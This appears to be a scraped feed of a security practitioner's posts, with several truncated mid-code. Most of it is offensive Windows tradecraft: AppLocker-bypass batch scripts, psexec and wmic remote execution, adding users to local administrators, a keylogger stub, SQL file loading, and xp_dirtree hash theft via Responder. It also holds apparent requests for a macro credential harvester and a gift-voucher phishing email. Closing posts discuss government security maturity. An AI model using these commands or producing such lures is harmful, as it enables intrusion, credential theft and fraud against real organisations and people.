Find writeable folders in c:\windows to bypass AppLocker
@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
icacls "c:\windows\%%a" | find ":(W)"
if %errorlevel% equ 0 echo "c:\windows\%%a is writable"
)
Try and bypass AppLocker
@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
echo Testing directory: "c:\windows\%%a"
echo "This file is a test." > "c:\windows\%%a\testfile.txt"
if %errorlevel% equ 0 (
echo "c:\windows\%%a is writable"
del… twitter.com/i/web/status/1…
make me a DLL that runs calc.exe and show me how to execute it via rundll32.exe
make me a cred harvester document in WORD using macros!
Send an email asking for gift vouchers urgently... LOL
net localgroup administrators /add DOMAIN\Username
ok this one is a bit odd..
psexec -i -s cmd.exe
//this will RUN a LOCAL SYSTEM
wmic /node:<remote_computer_name> /user:<username> process call create "<command_to_run>"
namespace Keylogger
{
class Program
{
static void Main(string[] args)
{
// Create a file stream for the log file
StreamWriter logfile = new… twitter.com/i/web/status/1…
INSERT INTO MyTable (ID, Filename, Filedata)
SELECT ROW_NUMBER() OVER (ORDER BY sub.[file]) AS ID,
sub.[file] AS Filename,
BulkColumn AS Filedata
FROM OPENROWSET(BULK… twitter.com/i/web/status/1…
Steal hashes by using xp_dirtree to read a file from a server running responder/inveigh ;)
#######################
CREATE TABLE MyTable (
ID int PRIMARY KEY,
Filename varchar(255),
Filedata varchar(MAX)
);
looks similar as almost every org I've worked with (super broad generalisation)
legacy systems oh my! wait till we see what runs in the private sector! (don't tell anyone about those 2008 servers!)
This might sound doom and gloom but having a view of maturity/resiliance across the government is a great thing! you can't address what you don't 'know' about!
This paragraph sounds in line with most orgs (IMHO)
I've been conducting maturity assessments for orgs of all shapes and sizes for a long long time! lots of people say they are a 3 when they are in fact a 1-2 (if we are using CMMi-SCV etc.)